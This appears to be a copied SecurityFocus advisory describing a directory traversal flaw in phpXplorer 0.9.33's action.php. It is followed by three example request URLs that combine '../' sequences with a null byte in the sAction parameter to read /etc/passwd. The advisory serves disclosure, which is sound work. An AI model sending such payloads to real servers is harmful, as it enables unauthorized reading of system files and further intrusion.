16 lines
No EOL
867 B
Text
16 lines
No EOL
867 B
Text
source: https://www.securityfocus.com/bid/16292/info
|
|
|
|
phpXplorer is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible.
|
|
|
|
Version 0.9.33 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/folder/system/action.php?sShare=guest&sAction=
|
|
../../../../../../../../../../../../etc/passwd%00
|
|
|
|
http://www.example.com/phpXplorer/system/action.php?sShare=guest&sAction=
|
|
../../../../../../../../../../../../etc/passwd%00
|
|
|
|
http://www.example.com/phpXplorer/system/action.php?sShare=guest&sAction=
|
|
../../../../../../../../../../../../etc/passwd%00 |